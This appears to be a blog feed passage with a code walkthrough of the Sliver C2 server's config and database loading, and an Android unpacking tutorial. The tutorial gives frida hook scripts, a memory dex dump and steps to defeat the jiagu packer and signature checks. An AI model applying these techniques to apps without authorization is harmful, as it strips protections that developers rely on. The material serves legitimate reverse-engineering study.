class="line">}</span><br></pre></td></tr></table></figure><p>GetServerConfigPath函数就是读取<code>~/.sliver/config/server.json</code></p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">getDefaultServerConfig</span><span class="params">()</span></span> *ServerConfig {</span><br><span class="line"><span class="keyword">return</span> &ServerConfig{</span><br><span class="line">DaemonMode: <span class="literal">false</span>,</span><br><span class="line">DaemonConfig: &DaemonConfig{</span><br><span class="line">Host: <span class="string">""</span>,</span><br><span class="line">Port: <span class="number">31337</span>,</span><br><span class="line">},</span><br><span class="line">Logs: &LogConfig{</span><br><span class="line">Level: <span class="type">int</span>(logrus.InfoLevel),</span><br><span class="line">GRPCUnaryPayloads: <span class="literal">false</span>,</span><br><span class="line">GRPCStreamPayloads: <span class="literal">false</span>,</span><br><span class="line">},</span><br><span class="line">CC: <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">string</span>{},</span><br><span class="line">CXX: <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">string</span>{},</span><br><span class="line">}</span><br><span 
class="line">}</span><br></pre></td></tr></table></figure><p>getDefaultServerConfig函数是返回一个默认的config内容</p><p><code>serverConfig := configs.GetServerConfig()</code>最后执行的结果就是获取<code>~/.sliver/config/server.json</code>的内容给到变量serverConfig<br>这里可以看下默认的config内容的样子</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">└─$ <span class="built_in">cat</span> ~/.sliver/configs/server.json </span><br><span class="line">{</span><br><span class="line"> <span class="string">"daemon_mode"</span>: <span class="literal">false</span>,</span><br><span class="line"> <span class="string">"daemon"</span>: {</span><br><span class="line"> <span class="string">"host"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"port"</span>: 31337,</span><br><span class="line"> <span class="string">"tailscale"</span>: <span class="literal">false</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"logs"</span>: {</span><br><span class="line"> <span class="string">"level"</span>: 4,</span><br><span class="line"> <span class="string">"grpc_unary_payloads"</span>: <span class="literal">false</span>,</span><br><span class="line"> <span class="string">"grpc_stream_payloads"</span>: <span class="literal">false</span>,</span><br><span class="line"> <span 
class="string">"tls_key_logger"</span>: <span class="literal">false</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"watch_tower"</span>: null,</span><br><span class="line"> <span class="string">"go_proxy"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"cc"</span>: {},</span><br><span class="line"> <span class="string">"cxx"</span>: {}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>接着代码是</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">listenerJobs, err := db.ListenerJobs()</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">err = StartPersistentJobs(listenerJobs)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>意思是获取数据库中保存的监听任务,也就是说,就算服务down了,重启自动就从数据库读取任务继续运行,或者说如果忘记结束job,这个job就一直跑着</p><p>然后的代码是</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> serverConfig.DaemonMode {</span><br><span class="line">daemon.Start(daemon.BlankHost, daemon.BlankPort, 
serverConfig.DaemonConfig.Tailscale)</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">os.Args = os.Args[:<span class="number">1</span>] <span class="comment">// Hide cli from grumble console</span></span><br><span class="line">console.Start()</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>查看服务配置文件是否配置守护进程,也就是配成service,如果有配置成守护进程,就监听端口可以进行多人协同。</p><h2 id="database-json"><a href="#database-json" class="headerlink" title="database.json"></a>database.json</h2><p>至于数据库</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> db</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">"gorm.io/gorm"</span></span><br><span class="line">)</span><br><span class="line"><span class="comment">// Client - Database Client</span></span><br><span class="line"><span class="keyword">var</span> Client = newDBClient()</span><br><span class="line"><span class="comment">// Session - Database session</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">Session</span><span class="params">()</span></span> *gorm.DB {</span><br><span class="line"><span class="keyword">return</span> Client.Session(&gorm.Session{</span><br><span class="line">FullSaveAssociations: <span class="literal">true</span>,</span><br><span class="line">})</span><br><span 
class="line">}</span><br></pre></td></tr></table></figure><p>可以看到有一个导出的Client和Session()</p><p>看看生成这个Client的newDBClient()</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// newDBClient - Initialize the db client</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">newDBClient</span><span class="params">()</span></span> *gorm.DB {</span><br><span class="line">dbConfig := configs.GetDatabaseConfig()</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> dbClient *gorm.DB</span><br><span class="line"><span class="keyword">switch</span> dbConfig.Dialect {</span><br><span class="line"><span class="keyword">case</span> configs.Sqlite:</span><br><span class="line">dbClient = sqliteClient(dbConfig)</span><br><span class="line"><span class="keyword">case</span> configs.Postgres:</span><br><span class="line">dbClient = postgresClient(dbConfig)</span><br><span class="line"><span class="keyword">case</span> configs.MySQL:</span><br><span class="line">dbClient = mySQLClient(dbConfig)</span><br><span class="line"><span class="keyword">default</span>:</span><br><span class="line"><span class="built_in">panic</span>(fmt.Sprintf(<span class="string">"Unknown DB Dialect: '%s'"</span>, dbConfig.Dialect))</span><br><span class="line">}</span><br><span 
class="line">.....</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>首先从dbConfig := configs.GetDatabaseConfig()获取配置文件<br>然后根据配置文件去连接数据库</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// GetDatabaseConfig - Get config value</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">GetDatabaseConfig</span><span class="params">()</span></span> *DatabaseConfig {</span><br><span class="line">configPath := GetDatabaseConfigPath()</span><br><span class="line">config := getDefaultDatabaseConfig()</span><br><span class="line">......</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>和前面server.json的函数相似<br>不过<code>GetDatabaseConfigPath()</code>读取的是`~/.sliver/config/database.json</p><p>看一下默认的内容</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">└─$ <span class="built_in">cat</span> ~/.sliver/configs/database.json </span><br><span class="line">{</span><br><span class="line"> <span class="string">"dialect"</span>: <span class="string">"sqlite3"</span>,</span><br><span class="line"> <span class="string">"database"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"username"</span>: <span 
class="string">""</span>,</span><br><span class="line"> <span class="string">"password"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"host"</span>: <span class="string">""</span>,</span><br><span class="line"> <span class="string">"port"</span>: 0,</span><br><span class="line"> <span class="string">"params"</span>: null,</span><br><span class="line"> <span class="string">"max_idle_conns"</span>: 10,</span><br><span class="line"> <span class="string">"max_open_conns"</span>: 100,</span><br><span class="line"> <span class="string">"log_level"</span>: <span class="string">"warn"</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>欢迎来关注我的公众号 GEEK-DREAM<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/imgqrcode_for_gh_5a1da2141918_258.jpg"></p>]]></content>
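The defaults-then-overlay loading performed by GetServerConfig and GetDatabaseConfig, together with the dialect switch in newDBClient, as an added example in Go. This is my own code, not Sliver's: the struct types are simplified mirrors of the fields shown above, the dialect strings other than "sqlite3" are assumed, and the JSON input is constructed. It shows why keys absent from the file keep their default values, and why a misspelled key is silently ignored unless the decoder is told to reject unknown fields, which is the check an operator reviewing a server.json would want.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
)

// Simplified mirrors of the config types the page shows (my own definitions,
// not Sliver's; only the fields discussed above are included).
type DaemonConfig struct {
	Host string `json:"host"`
	Port uint16 `json:"port"`
}

type LogConfig struct {
	Level int `json:"level"`
}

type ServerConfig struct {
	DaemonMode bool          `json:"daemon_mode"`
	Daemon     *DaemonConfig `json:"daemon"`
	Logs       *LogConfig    `json:"logs"`
}

type DatabaseConfig struct {
	Dialect string `json:"dialect"`
}

// Dialect names accepted by the switch in newDBClient. "sqlite3" is the value
// seen in database.json above; the other two strings are assumed here.
const (
	Sqlite   = "sqlite3"
	Postgres = "postgres"
	MySQL    = "mysql"
)

// defaultServerConfig plays the role of getDefaultServerConfig: daemon mode
// off, port 31337, log level 4 (logrus.InfoLevel), as in the default server.json.
func defaultServerConfig() *ServerConfig {
	cfg := new(ServerConfig)
	cfg.Daemon = new(DaemonConfig)
	cfg.Daemon.Port = 31337
	cfg.Logs = new(LogConfig)
	cfg.Logs.Level = 4
	return cfg
}

// LoadServerConfig applies the defaults-then-overlay pattern of GetServerConfig:
// the JSON is decoded on top of the defaults, so keys absent from the file keep
// their default values. With strict=true a key the struct does not know is an
// error; otherwise a misspelled key is silently ignored and the default stays.
func LoadServerConfig(data []byte, strict bool) (*ServerConfig, error) {
	cfg := defaultServerConfig()
	dec := json.NewDecoder(bytes.NewReader(data))
	if strict {
		dec.DisallowUnknownFields()
	}
	if err := dec.Decode(cfg); err != nil {
		return nil, err
	}
	return cfg, nil
}

// SelectDialect mirrors the dialect switch in newDBClient but returns an error
// instead of panicking, which is what a caller validating a config would want.
func SelectDialect(db *DatabaseConfig) (string, error) {
	switch db.Dialect {
	case Sqlite, Postgres, MySQL:
		return db.Dialect, nil
	default:
		return "", fmt.Errorf("unknown DB dialect: %q", db.Dialect)
	}
}

func main() {
	// Constructed sample: only the host is given, and "daemon_mode" is misspelled.
	sample := []byte(`{"deamon_mode": true, "daemon": {"host": "127.0.0.1"}}`)

	lenient, err := LoadServerConfig(sample, false)
	if err != nil {
		fmt.Println("lenient load failed:", err)
		return
	}
	// Port stays 31337 from the defaults; the misspelled key left DaemonMode false.
	fmt.Println("lenient:", lenient.DaemonMode, lenient.Daemon.Host, lenient.Daemon.Port)

	_, err = LoadServerConfig(sample, true)
	fmt.Println("strict:", err)

	db := new(DatabaseConfig)
	db.Dialect = "sqlite3"
	fmt.Println(SelectDialect(db))
}
```

Run it as-is: the lenient load reports daemon mode off with the default port, while the strict load returns an error naming the unknown key, which is the difference between a typo going unnoticed and being caught at startup.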
<categories>
<category> Code study </category>
</categories>
<tags>
<tag> sliver-port </tag>
<tag> C2 </tag>
<tag> Cobra </tag>
</tags>
</entry>
<entry>
<title>Android Unpacking</title>
<link href="/2024/03/10/Android%E8%84%B1%E5%A3%B3/"/>
<url>/2024/03/10/Android%E8%84%B1%E5%A3%B3/</url>
<content type="html"><![CDATA[<h1 id="Android脱壳"><a href="#Android脱壳" class="headerlink" title="Android脱壳"></a>Android Unpacking</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1. Introduction</h2><p>Using the frida toolkit as the basis, this post summarizes techniques for unpacking packed (encrypted) Android apps, along with simple repair methods.</p><p><strong>Web systems</strong>: the code runs mainly on the back-end server</p><p><strong>Android apps</strong>: code runs on both the client and the back-end server</p><p>So a complete analysis of an app's client side requires unpacking it to recover the code.</p><h2 id="2-脱壳思路"><a href="#2-脱壳思路" class="headerlink" title="2.脱壳思路"></a>2. Unpacking approaches</h2><ul><li>Hook the delete methods (yields the most accurate set of classes)</li><li>Dump the classes from memory (fairly accurate)</li><li>Hook the <code>DefineClass</code> method of <code>ClassLinker</code> (the result also includes classes that do not belong to the target app)</li></ul><h3 id="2-1HOOK删除方法"><a href="#2-1HOOK删除方法" class="headerlink" title="2.1HOOK删除方法"></a>2.1 Hooking the delete methods</h3><p>A packed app decrypts its apk before running and deletes it afterwards, so capturing the file being deleted yields the unencrypted apk.</p><p>On Android, deletion goes through either the <code>delete</code> method of <code>java.io.File</code> or the native-layer <code>unlink</code>.</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//delete.js</span></span><br><span class="line"><span class="comment">// Hook the delete method: do not actually delete, just capture the path of the file being deleted and log it</span></span><br><span class="line"><span class="title class_">Java</span>.<span class="title function_">perform</span>(<span class="keyword">function</span>(<span class="params"></span>){</span><br><span class="line"> <span class="keyword">var</span> f = <span class="title class_">Java</span>.<span class="title function_">use</span>(<span class="string">"java.io.File"</span>);</span><br><span class="line"> f.<span class="property">delete</span>.<span class="property">implementation</span>=<span class="keyword">function</span>(<span class="params"></span>){</span><br><span class="line"> <span class="keyword">var</span> path = <span class="variable language_">this</span>.<span class="title function_">getAbsolutePath</span>();</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[+] Delete caught => <span class="subst">${path}</span>`</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="comment">//frida -U -l ./delete.js -f com.xxx.xxx</span></span><br><span class="line"><span class="comment">//com.xxx.xxx is the app package name</span></span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310101102247.png" alt="image-20240310101102247"></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//unlink.js</span></span><br><span class="line"><span class="comment">// Hook the native-layer unlink: replace it with Interceptor.replace so nothing is deleted, just capture the path of the file being deleted and log it</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> unlinkPtr = <span class="title class_">Module</span>.<span class="title function_">findExportByName</span>(<span class="literal">null</span>,<span class="string">"unlink"</span>);</span><br><span class="line"><span class="title class_">Interceptor</span>.<span class="title function_">replace</span>(unlinkPtr,<span class="keyword">new</span> <span class="title class_">NativeCallback</span>(<span class="keyword">function</span>(<span class="params">path</span>){</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[+]unlink:<span class="subst">${path.readCString()}</span>`</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">},<span class="string">'int'</span>,[<span class="string">'pointer'</span>]));</span><br><span class="line"></span><br><span class="line"><span class="comment">//frida -U -l ./unlink.js -f com.xxx.xxx</span></span><br><span class="line"><span class="comment">//com.xxx.xxx is the app package name</span></span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310101033577.png" alt="image-20240310101033577"></p><h3 id="2-2Dump内存中的类"><a href="#2-2Dump内存中的类" class="headerlink" title="2.2Dump内存中的类"></a>2.2 Dumping classes from memory</h3><p>Capture the classes that have been loaded into memory.</p><ul><li>Automated tool (<a href="https://github.com/hluwa/frida-dexdump">hluwa/frida-dexdump)</a></li><li>Manual dump</li></ul><h4 id="2-2-1自动化工具使用"><a href="#2-2-1自动化工具使用" class="headerlink" title="2.2.1自动化工具使用"></a>2.2.1 Using the automated tool</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// Prerequisite: frida must be installed</span><br><span class="line">// Install it with: pip3 install frida && pip3 install frida-tools</span><br><span class="line">pip3 install frida-dexdump</span><br><span class="line">// com.xxx.xxx is the target app package name</span><br><span class="line">frida-dexdump -U -f com.xxx.xxx</span><br></pre></td></tr></table></figure><h4 id="2-2-2手动dump"><a href="#2-2-2手动dump" class="headerlink" title="2.2.2手动dump"></a>2.2.2 Manual dump</h4><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">adb shell</span><br><span class="line">// Inside the adb shell, find the pid of the running app; <span class="string">"xxx"</span> is the app package name</span><br><span class="line"><span class="comment"># ps -A | grep -i "xxx"</span></span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310095235660.png" alt="image-20240310095235660"></p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// Using the pid found above, look for dex files in its maps</span><br><span class="line"><span class="comment"># cat /proc/{pid}/maps | grep -i "dex"</span></span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310101346798.png" alt="image-20240310101346798"></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//dump.js</span></span><br><span class="line"><span class="comment">// Hard-code the addresses found above; keep the app running and attach frida directly to grab the target dex</span></span><br><span class="line"><span class="comment">//var starAddress = ptr(0x6eb16cb000);</span></span><br><span class="line"><span class="comment">//var endAddress = ptr(0x6eb32da000);</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> starAddress = <span class="title function_">ptr</span>(<span class="number">0x6eb16cb000</span>);</span><br><span class="line"><span class="keyword">var</span> endAddress = <span class="title function_">ptr</span>(<span class="number">0x6eb32da000</span>);</span><br><span class="line"><span class="keyword">var</span> size = endAddress.<span class="title function_">sub</span>(starAddress);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[+] Dumping memory region <span class="subst">${starAddress}</span> : <span class="subst">${endAddress}</span>`</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> buffer = <span class="title class_">Memory</span>.<span class="title function_">readByteArray</span>(starAddress,<span class="built_in">parseInt</span>(size,<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> filePath = <span class="string">"/data/local/tmp/"</span>+starAddress+<span class="string">"_dump.dex"</span>;</span><br><span class="line"><span class="keyword">var</span> fileHande = <span class="keyword">new</span> <span class="title class_">File</span>(filePath,<span class="string">"wb"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(fileHande && fileHande!=<span class="literal">null</span>){</span><br><span class="line"> fileHande.<span class="title function_">write</span>(buffer);</span><br><span class="line"> fileHande.<span class="title function_">flush</span>();</span><br><span class="line"> fileHande.<span class="title function_">close</span>();</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[*] File successfully dumped at <span class="subst">${filePath}</span>`</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">//frida-ps -Ua  lists the target app's process name</span></span><br><span class="line"><span class="comment">//frida -U -l ./dump.js [target app process name]</span></span><br><span class="line"><span class="comment">// Because the addresses are hard-coded here, they change if the app is restarted</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Look for the result in /data/local/tmp/, in files ending with _dump.dex</span></span><br></pre></td></tr></table></figure><h3 id="2-3HOOK-ClassLinker-的-DefineClass-方法"><a href="#2-3HOOK-ClassLinker-的-DefineClass-方法" class="headerlink" title="2.3HOOK ClassLinker 的 DefineClass 方法"></a>2.3 Hooking the <code>DefineClass</code> method of <code>ClassLinker</code></h3><p>Use an existing frida script project to dump the target.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/lasting-yang/frida_dump.git</span><br><span class="line">cd frida_dump</span><br><span class="line">frida -U -l dump_dex.js -f com.xxx.xxx</span><br><span class="line">// com.xxx.xxx is the target package name</span><br></pre></td></tr></table></figure><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310101820442.png" alt="image-20240310101820442"></p><h2 id="3-简单修复"><a href="#3-简单修复" class="headerlink" title="3.简单修复"></a>3. Simple repair</h2><p>Repair tool: MT Manager (MT管理器)</p><h3 id="3-1满足静态分析工具(步骤做完即可用jd或者jadx进行分析)"><a href="#3-1满足静态分析工具(步骤做完即可用jd或者jadx进行分析)" class="headerlink" title="3.1满足静态分析工具(步骤做完即可用jd或者jadx进行分析)"></a>3.1 Making the output usable by static analysis tools (after these steps it can be analyzed with jd or jadx)</h3><p>Rename the classes.dex inside the packed apk, and extract it into the unpacked set on the left.</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310102348374.png" alt="image-20240310102348374"></p><p>Select all the dex files and run dex repair on them.</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310102117343.png" alt="image-20240310102117343"></p><p>Batch-rename them, and rename the first one, classes1.dex, to classes.dex so that the normal dex naming convention is satisfied.</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310102616047.png" alt="image-20240310102616047"></p><p>Put the renamed dex files back into the apk.</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310102844877.png" alt="image-20240310102844877"></p><p>Re-split the app's dex files.</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310103042616.png" alt="image-20240310103042616"></p><h3 id="3-2-去除so层"><a href="#3-2-去除so层" class="headerlink" title="3.2 去除so层"></a>3.2 Removing the so layer</h3><p>Here the jiagu packer (数字壳) is used as the example (works on older versions; not guaranteed on newer ones).</p><p>Rename libjiagu.so and libjiagu_x86.so to libxxxxx.so and libxxxxx_x86.so.</p><p>jiagu has five letters, so xxxxx can be any five characters.</p><p>Here libxxxxx.so is used.</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310103950120.png" alt="image-20240310103950120"></p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310104033222.png" alt="image-20240310104033222"></p><p>Replace every occurrence of jiagu inside the so file with xxxxx.</p><p><img src="/2024/03/10/Android%E8%84%B1%E5%A3%B3/image-20240310104407472.png" alt="image-20240310104407472"></p><p>To make the app run normally, signature verification also has to be taken into account; it can later be bypassed by hooking the internal signature check with frida.</p><p>References:</p><p><a href="https://www.youtube.com/watch?v=PLX8_z0EmGw">How to Unpack Protected Android APK with Frida (youtube.com)</a></p><p><a href="https://www.youtube.com/watch?v=FeJuxRQUVnU">https://www.youtube.com/watch?v=FeJuxRQUVnU</a></p><p><a href="https://github.com/lasting-yang/frida_dump">https://github.com/lasting-yang/frida_dump</a></p>]]></content>
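A check for the memory dumps produced in section 2.2 and for the dex repair step of section 3.1, as an added example in Go (my own code, not frida-dexdump's, frida_dump's or MT Manager's). It parses the dex header, verifies the embedded adler32 checksum and SHA-1 signature against the bytes they cover, trims a dump to its file_size, and recomputes both fields, which are the two fields a dex repair restores. The dex bytes are a constructed header-only sample with trailing garbage standing in for the extra bytes of a dumped memory region; the field offsets are those of the DEX header layout documented by AOSP.

```go
package main

import (
	"bytes"
	"crypto/sha1"
	"encoding/binary"
	"errors"
	"fmt"
	"hash/adler32"
)

// Offsets from the DEX header layout (AOSP dex_format documentation).
const (
	dexHeaderSize  = 0x70
	offChecksum    = 8  // uint32 adler32 over everything after this field
	offSignature   = 12 // 20-byte SHA-1 over everything after this field
	offFileSize    = 32
	offHeaderSize  = 36
	offEndianTag   = 40
	endianConstant = 0x12345678
)

var dexMagic = []byte("dex\n035\x00")

type DexHeader struct {
	Version     string
	FileSize    uint32
	HeaderSize  uint32
	ChecksumOK  bool
	SignatureOK bool
}

// ParseDexHeader reads the header of a dump and reports whether the embedded
// checksum and signature match the bytes they are supposed to cover.
func ParseDexHeader(b []byte) (*DexHeader, error) {
	if dexHeaderSize > len(b) {
		return nil, errors.New("buffer shorter than a dex header")
	}
	if !bytes.Equal(b[0:4], []byte("dex\n")) {
		return nil, errors.New("missing dex magic")
	}
	h := new(DexHeader)
	h.Version = string(b[4:7])
	h.FileSize = binary.LittleEndian.Uint32(b[offFileSize:])
	h.HeaderSize = binary.LittleEndian.Uint32(b[offHeaderSize:])
	if binary.LittleEndian.Uint32(b[offEndianTag:]) != endianConstant {
		return nil, errors.New("unexpected endian tag")
	}
	if dexHeaderSize > h.FileSize || h.FileSize > uint32(len(b)) {
		return nil, fmt.Errorf("implausible file_size %d for a dump of %d bytes", h.FileSize, len(b))
	}
	// Only the first file_size bytes belong to the dex; a dumped region may carry more.
	body := b[:h.FileSize]
	h.ChecksumOK = binary.LittleEndian.Uint32(body[offChecksum:]) == adler32.Checksum(body[offSignature:])
	sig := sha1.Sum(body[offFileSize:])
	h.SignatureOK = bytes.Equal(body[offSignature:offFileSize], sig[:])
	return h, nil
}

// RepairDex trims a dump to file_size and recomputes the signature, then the
// checksum. The signature must come first, because the checksum covers it.
func RepairDex(dump []byte) ([]byte, error) {
	if dexHeaderSize > len(dump) || !bytes.Equal(dump[0:4], []byte("dex\n")) {
		return nil, errors.New("not a dex header")
	}
	size := binary.LittleEndian.Uint32(dump[offFileSize:])
	if dexHeaderSize > size || size > uint32(len(dump)) {
		return nil, errors.New("implausible file_size")
	}
	out := make([]byte, size)
	copy(out, dump[:size])
	sig := sha1.Sum(out[offFileSize:])
	copy(out[offSignature:], sig[:])
	binary.LittleEndian.PutUint32(out[offChecksum:], adler32.Checksum(out[offSignature:]))
	return out, nil
}

// sampleDump builds a constructed header-only dex (file_size 0x70) whose
// checksum and signature are left zeroed, followed by 16 bytes of garbage the
// way a raw memory-region dump carries bytes past the end of the file.
func sampleDump() []byte {
	hdr := make([]byte, dexHeaderSize)
	copy(hdr, dexMagic)
	binary.LittleEndian.PutUint32(hdr[offFileSize:], dexHeaderSize)
	binary.LittleEndian.PutUint32(hdr[offHeaderSize:], dexHeaderSize)
	binary.LittleEndian.PutUint32(hdr[offEndianTag:], endianConstant)
	return append(hdr, bytes.Repeat([]byte{0xAA}, 16)...)
}

func main() {
	dump := sampleDump()
	before, err := ParseDexHeader(dump)
	if err != nil {
		fmt.Println("parse failed:", err)
		return
	}
	fmt.Printf("dumped: version %s file_size %d checksum_ok %v signature_ok %v\n",
		before.Version, before.FileSize, before.ChecksumOK, before.SignatureOK)
	fixed, err := RepairDex(dump)
	if err != nil {
		fmt.Println("repair failed:", err)
		return
	}
	after, _ := ParseDexHeader(fixed)
	fmt.Printf("repaired: %d bytes checksum_ok %v signature_ok %v\n",
		len(fixed), after.ChecksumOK, after.SignatureOK)
}
```

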